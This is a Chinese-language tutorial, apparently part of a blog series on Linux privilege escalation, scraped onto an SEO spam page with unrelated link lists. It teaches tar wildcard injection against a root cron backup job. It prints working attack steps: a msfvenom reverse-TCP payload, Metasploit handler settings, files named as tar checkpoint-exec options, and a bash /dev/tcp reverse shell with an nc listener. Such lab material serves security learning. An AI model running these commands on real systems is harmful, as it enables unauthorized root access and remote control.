当前位置: 首页 > news >正文

网页制作与网站建设在线作业兰州搜索引擎优化

网页制作与网站建设在线作业,兰州搜索引擎优化,网站公司的好坏,wordpress用户更改不了密码系列文章 操作系统权限提升(十八)之Linux提权-内核提权 操作系统权限提升(十九)之Linux提权-SUID提权 操作系统权限提升(二十)之Linux提权-计划任务提权 操作系统权限提升(二十一)之Linux提权-环境变量劫持提权 操作系统权限提升(二十二)之Linux提权-SUDO滥用提权 利用通配符…

系列文章

操作系统权限提升(十八)之Linux提权-内核提权
操作系统权限提升(十九)之Linux提权-SUID提权
操作系统权限提升(二十)之Linux提权-计划任务提权
操作系统权限提升(二十一)之Linux提权-环境变量劫持提权
操作系统权限提升(二十二)之Linux提权-SUDO滥用提权

利用通配符(WS)进行提权

利用通配符(WS)进行提权原理

接下来介绍一个非常有趣而又古老的技术通配符注入提权

首先先看下什么是通配符

在LINUX中通配符可以被用来模糊匹配,而且通配符的输入是由当前用户的shell去进行解析

* 代表任意数量的字符? 字符代表单个字符[] 匹配中括号中的任意单一字符 可以使用连字符-表示范围,比如[0-9]

我们在当前的目录创建几个文本,1.txt,2.txt,3.txt

在这里插入图片描述
接下来使用通配符去查看文件 ls ?.txt 可以查到 一个字符后面加.txt的文件

在这里插入图片描述

我们在当前目录在创建几个文件,a.txt,ab.txt,abc.txt

在这里插入图片描述

然后使用?进行匹配,可以看到?可以匹配单个字符

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用*进行匹配,代表任意的多个字符

在这里插入图片描述

使用ls [0-9].txt,匹配0-9数字的txt

在这里插入图片描述
[...] 匹配方括号之中的任意一个字符

在这里插入图片描述

接下来看一下什么是Wildcard wildness简称WS

我们先创建3个文件

echo "1" > file1
echo "2" >file2
echo "3" > --help

在这里插入图片描述

接下来查看文件里面的内容,发现文件1和文件2都可以查看,但是–help查看不了,直接调出了–help的命令,这种类型的技巧称为Wildcard wildness。

在这里插入图片描述

这时如果我们执行 ls * 那么就会执行 ls --help

在这里插入图片描述

如何利用这一点进行提权呢?大家和思考一下

如果有的命令的参数中可以去执行linux命令,我们进行劫持,达到提权的目的,我们以tar命令为例子

tar命令是Linux中的压缩命令,可以对文件进行压缩

tar -czf html.tgz 1.html #将文件1.html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

也可以使用通配符进行压缩

tar -czf html.tgz *.html #将文件所有html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

在tar中有执行linux命令的参数如下

tar -czf 1.tgz 1.html --checkpoint=1 --checkpoint-action=exec=whoami

在这里插入图片描述

可以对后面的命令进行劫持 ,只需要要编写一个这样的参数文件就行可以了

echo " " > --checkpoint=1
echo " " > --checkpoint-action=exec=whoami

在这里插入图片描述

接着运行 tar -czf html.tgz *

在这里插入图片描述

提权准备

一般都有备份网站的习惯,那么运维人员或管理员填写了备份文件的计划任务任务,如果滥用了通配符,就可能导致提权

*/1 * * * * root tar -cvf /var/html.tgz /var/www/html/ *

在这里插入图片描述

提权实战

首先上线MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.41.211 LPORT=8888 -f elf > mshell.elfuse exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.41.211
set lport 8888
run

在这里插入图片描述

查看计划任务,发现有滥用通配符的,并且是root权限,可以进行提权

cat /etc/crontab

在这里插入图片描述

在/var/www/html下创建两个文件如下

echo " " > /var/www/html/--checkpoint=1
echo " " > /var/www/html/--checkpoint-action=exec='bash shell.sh'
echo "bash -i >& /dev/tcp/192.168.41.211/8888 0>&1" >> /var/www/html/shell.sh

在这里插入图片描述

使用NC进行监听,等待sh脚本被执行,连接NC

nc -lvvp 8888

在这里插入图片描述

http://www.qdjiajiao.com/news/10485.html

相关文章:

  • 亚洲av成人片无码网站在线观看seo点击工具
  • 上海网站建站建设seo工具不包括
  • 建设网站 软件小程序开发哪家更靠谱
  • 网络营销策划方案案例范文北京搜索优化排名公司
  • 3d建模网站企业网站管理
  • 专门做av字幕的网站有哪些百度贴吧的互动社区
  • 中山网站开发招聘客服外包平台
  • 简洁文章网站模板下载seo搜索优化是什么意思
  • 网站开发的特点天津seo关键词排名优化
  • 做网站机构图用什么工具中超最新积分榜
  • 西安月子中心网站制作中国国家培训网靠谱吗
  • 常州网站建设效果win7优化大师下载
  • 福建定制网站开发搜索引擎怎么做
  • 实用性网站建设开题报告网站关键词上首页
  • 仙桃网站设计外链生成网站
  • 网页模板下载html厦门seo优化外包公司
  • 网站建设的细节处理百度推广网址是多少
  • 做网站搜爬闪刷钻业务推广网站
  • 陕西因酷网站建设网站运营与维护
  • bigdropinc是什么网站网站推广seo设置
  • 网站详情页怎么做网络营销题库案例题
  • 重庆网站建设制作设计友情链接翻译
  • 衡水做网站找谁搜索关键词网站
  • 制作卖东西网站百度搜索引擎入口官网
  • 网站如何添加图标成都网站建设
  • 温州外贸公司网站建设公司排名百度店铺怎么入驻
  • 电子商务网站推广的主要方法百度有钱花人工客服
  • 做网页和做网站系统优化软件
  • wordpress怎么做淘客网站网站推广平台
  • 海珠网站建设灯塔seo